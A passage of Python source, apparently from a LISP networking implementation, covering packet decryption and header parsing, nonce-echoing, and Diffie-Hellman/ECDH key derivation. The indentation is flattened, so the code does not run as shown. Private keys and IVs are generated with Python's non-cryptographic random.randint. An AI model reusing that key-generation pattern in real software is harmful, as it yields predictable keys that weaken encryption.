ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key, addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Chacha produced plaintext in unicode for py2. Convert to raw-
# unicode-escape before proceeding. Do this in do_icv() too.
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
packet = packet.encode("raw_unicode_escape")
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
# MF bit set or non-zero offset means fragment; mask off the DF bit.
self.inner_is_fragment = ((frag_field & 0x3fff) != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
#
# Use one-byte slices rather than integer indexing so this works on
# both py2 strings and py3 byte strings.
#
return(mac[1:2] + mac[0:1] + mac[3:4] + mac[2:3] + mac[5:6] + mac[4:5])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9:10])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6:7])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
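#
# Illustrative note: the OR with 0xf000 above pins the encap source
# port into [0xf000, 0xffff], giving 4096 possible ports for ECMP
# load-splitting while staying clear of well-known ports, e.g.:
#
#   0xf000 | (0x12345 & 0xfff) == 0xf345
#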
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where an Info-Request is inside a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (iid not in lisp_iid_to_interface): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#enddef
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9:10] if self.inner_version == 4 else packet[6:7]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endif
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#enddef
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header(object):
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
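#
# Minimal usage sketch for lisp_data_header (illustrative only):
#
#   hdr = lisp_data_header()
#   hdr.nonce(0x123456)       # sets N-bit plus nonce
#   hdr.instance_id(1000)     # sets I-bit plus iid
#   raw = hdr.encode()        # 8 bytes, network byte order
#   copy = lisp_data_header()
#   copy.decode(raw)          # returns True
#   copy.get_instance_id()    # 1000
#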
class lisp_echo_nonce(object):
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# an echo response and some time (10 seconds) has passed.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start request-nonce mode and get a new nonce. If a request-nonce is
# already stored, use the same nonce as last time regardless of
# whether we received an echo response. The high-order bit being set
# tells the caller to set the e-bit in the header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
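#
# Summary of the return values above (illustrative): callers get back
# an echo-nonce (high-order bit clear), a request-nonce (high-order
# bit set, which lisp_packet.encode() turns into an e-bit header), or
# None when request-nonce mode just timed out.
#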
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long it's been since the last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If last received echo was a while ago and a new request-nonce was
# sent recently, say the echo happened so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys(object):
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key.encode())
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
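#
# Illustrative note on the IV sizes packed above: 8 bytes ("Q") for
# chacha20, 12 bytes ("I" + "Q") for AES-GCM, and 16 bytes ("QQ") for
# AES-CBC. Because self.iv increments per packet, IVs do not repeat
# within a key's lifetime.
#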
def key_length(self, key):
if (isinstance(key, int)): key = self.normalize_pub_key(key)
return(old_div(len(key), 2))
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
top = k[0:4].decode()
bot = k[-4::].decode()
return("0x{}...{}({})".format(top, bot, self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (isinstance(key, int)):
key = lisp_hex_string(key).zfill(256)
return(key)
#endif
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(pow(g, key, p))
#enddef
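#
# Toy-number sketch of the DH exchange implemented here (illustrative
# values, not the real 1024-bit group): both sides derive the same
# shared secret.
#
#   g, p = 5, 23
#   a, b = 6, 15              # private keys
#   A = pow(g, a, p)          # 8, sent to peer
#   B = pow(g, b, p)          # 19, sent to peer
#   assert pow(B, a, p) == pow(A, b, p) == 2   # shared secret
#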
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = pow(remote_key, key, p)
#endif
#
# This should only be used in a lab for debugging and never live since
# it's a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != int): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != int): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context.encode(), data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
ek = lisp_hex_string(ek).zfill(32)
self.encrypt_key = ek.encode()
fill = 32 if self.do_poly else 40
ik = lisp_hex_string(ik).zfill(fill)
self.icv_key = ik.encode()
#enddef
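#
# Worked example of the split above (illustrative): if key_material
# were (0xAA << 128) | 0xBB, then the encryption key is 0xAA (the
# upper 128 bits) and the ICV key is 0xBB (the lower 128 bits).
#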
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
if (lisp_is_python2()):
hash_output = hexlify(hash_output.encode("raw_unicode_escape"))
else:
hash_output = hexlify(hash_output).decode()
#endif
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (nonce not in lisp_crypto_keys_by_nonce):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (nonce not in lisp_crypto_keys_by_nonce): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (addr_str not in by_rlocs):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
